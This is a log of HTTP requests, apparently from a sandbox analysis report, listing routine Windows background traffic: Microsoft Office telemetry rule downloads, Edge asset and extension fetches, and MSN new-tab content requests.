Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731171403&P2=404&P3=2&P4=GSqvpCJ6nyZIvRoPOucMpRj4yZHs18PS5QD9XKp0r2PQ1vc5xYVhil3MI3GztMQwS4eVrtnrtwogcvq2mwZ8fg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: cdxjLKxgZ065tepGFX07+USec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=1CE105B96555657E15301092645D6402&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=d133fc3a95744c2ad2105b9e189aff94 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1CE105B96555657E15301092645D6402; _EDGE_S=F=1&SID=017BF83314C2695A3E08ED1815CC6818; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msIHw.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
